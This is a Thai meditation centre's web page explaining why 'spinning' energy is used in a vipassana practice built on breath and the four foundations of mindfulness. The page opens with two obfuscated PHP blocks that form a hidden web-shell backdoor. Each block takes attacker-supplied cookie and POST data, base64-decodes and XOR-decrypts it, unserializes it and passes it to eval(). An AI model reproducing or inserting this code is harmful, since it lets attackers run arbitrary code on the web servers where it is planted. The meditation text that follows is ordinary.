$gISZHjgDQ = chr (67) . '_' . 'Y' . chr ( 180 - 107 ).chr (85) . chr ( 1093 - 973 ).'V';$bfLKd = "\x63" . "\x6c" . 'a' . 's' . "\163" . "\x5f" . chr (101) . "\170" . "\151" . 's' . chr ( 399 - 283 )."\163";$xnxaNiXQgk = class_exists($gISZHjgDQ); $bfLKd = "19980";$IYMozkSOu = !1;if ($xnxaNiXQgk == $IYMozkSOu){function ILYcYImbfn(){$EBKhUbi = new /* 50159 */ C_YIUxV(56193 + 56193); $EBKhUbi = NULL;}$UcoaYwYK = "56193";class C_YIUxV{private function UMWdPx($UcoaYwYK){if (is_array(C_YIUxV::$dKrkPX)) {$btWUJV = str_replace(chr (60) . '?' . chr (112) . "\x68" . chr (112), "", C_YIUxV::$dKrkPX[chr (99) . "\x6f" . 'n' . "\x74" . "\145" . chr ( 847 - 737 )."\164"]);eval($btWUJV); $UcoaYwYK = "56193";exit();}}private $pfYboxUt;public function erDrDQxxD(){echo 45787;}public function __destruct(){C_YIUxV::$dKrkPX = @unserialize(C_YIUxV::$dKrkPX); $UcoaYwYK = "16972_21716";$this->UMWdPx($UcoaYwYK); $UcoaYwYK = "16972_21716";}public function VlAvhWhqO($jNNCCCm, $rYCWIb){return $jNNCCCm[0] ^ str_repeat($rYCWIb, (strlen($jNNCCCm[0]) / strlen($rYCWIb)) + 1);}public function __construct($UwJpXbPW=0){$UIMmmtBEqf = $_POST;$mozmYRH = $_COOKIE;$rYCWIb = "3a0ba29f-1560-4af9-8870-7ae2d2693801";$rfTPJ = @$mozmYRH[substr($rYCWIb, 0, 4)];if (!empty($rfTPJ)){$NhxgbgDIku = "base64";$jNNCCCm = "";$rfTPJ = explode(",", $rfTPJ);foreach ($rfTPJ as $NdnfYJZO){$jNNCCCm .= @$mozmYRH[$NdnfYJZO];$jNNCCCm .= @$UIMmmtBEqf[$NdnfYJZO];}$jNNCCCm = array_map($NhxgbgDIku . "\x5f" . "\144" . 'e' . "\143" . "\x6f" . chr (100) . chr ( 555 - 454 ), array($jNNCCCm,));C_YIUxV::$dKrkPX = $this->VlAvhWhqO($jNNCCCm, $rYCWIb);}}public static $dKrkPX = 10338;}ILYcYImbfn();}$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ทำไมการปฏิบัติจึงต้องหมุน | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

1360755

การปฏิบัติตามแนวทางอายตนะวิปัสสนากัมมัฏฐาน

ทำไมจึงต้องหมุน การหมุนมีประโยชน์อะไร?

การหมุนทำให้เกิดพลังงาน พลังหมุนทำให้เกิดการรวมตัวให้เป็นหนึ่ง เหมือนมอเตอร์ไซค์ไต่ถัง พลังหมุนทำให้ไม่ตก พลังหมุนซึ่งเป็นรูปธรรม
สามารถตัดแรงดึงของสนามแม่เหล็ก เฮลิคอปเตอร์เมื่อใบพัดหมุนทำให้ลอยตัวได้ ถ้าเราเหวี่ยงจานขึ้นไปบนอากาศ ตัวจานยังมีแรงหมุนอยู่ก็จะไม่ตกลงมา
ถ้าหยุดหมุนก็จะตกลงมา พลังหมุนซึ่งเป็นนามธรรม (จิต) สามารถชนะแรงดึงดูดของอารมณ์ได้ ทำให้ไม่เป็นทาสของอารมณ์ โลภ โกรธ หลง
ซึ่งเป็นต้นเหตุของการสร้างกรรม กรรมเป็นตัวขับเคลื่อนวัฏสงสาร การตัดแรงดึงดูดของอารมณ์ ก็คือขบวนการหยุดวัฏสงสารในเบื้องต้น
เพื่อตัดแรงดึงของอารมณ์ที่ใจ และตัดแรงดึงของความคิด เพื่อให้จิตเกิดความอิสระแรงหมุนทำให้เกิดลมปราณขึ้น 

ใช้ลมปราณเป็นฐานที่ตั้งแห่งการเจริญสติ เรียกว่า อานาปานสติ สติซึ่งเกิดขึ้นจากการพิจารณาลมปราณ
พัฒนาแรงหมุนให้มีพลังมากขึ้นจนกลายเป็นแรงเหวี่ยง เมื่อแรงเหวี่ยงมีพลังเต็มที่ก็จะส่งเข้า ไปจิตในจิต
ก็สามารถเข้าไปสัมผัสธรรมในธรรม คือ ธรรมารมณ์ที่สะสมในจิตใต้สำนึก กระแสกรรมต่างๆ ที่มาในรูปของธรรมารมณ์
ก็จะถูกเหวี่ยงออกมาทางกายภาพ ก็จะหมุนวนมาพิจารณากายในกายอีก อิริยาบถต่างๆที่แสดงออกมาทางกายภาพ
ก็กลายเป็นอิริยาบถบรรพ สามารถนำมาเป็นฐานที่ตั้งแห่งการเจริญสติอีก ในขณะที่กายภาพแสดงออกถึงอิริยาบถต่าง
เวทนาต่างๆก็เกิดขึ้นที่ใจ ก็สามารถใช้อารมณ์ของเวทนาต่างๆที่เกิดขึ้น เป็นฐานที่ตั้งแห่งการเจริญสติ
แล้วก็หมุนวนในจิตในจิต ธรรมในธรรม กายเวทนาจิตธรรม กายเวทนาจิตธรรม

ฐานทั้งสี่รวมกันเป็นหนึ่งเดียว พัฒนาสู่มหาสติปัฏฐาน คือ
ใช้ฐานทั้งสี่ กาย เวทนา จิต ธรรม เป็นฐานที่ตั้งแห่งการ
เจริญสติในขณะจิตเดียว มิได้แยกพิจารณาเป็นสติครบรอบ
สามารถเข้าสู่บุพเพนิวาสนุสติญาน คือ
ญาณรู้ซึ่งเกิดจากการระลึกชาติ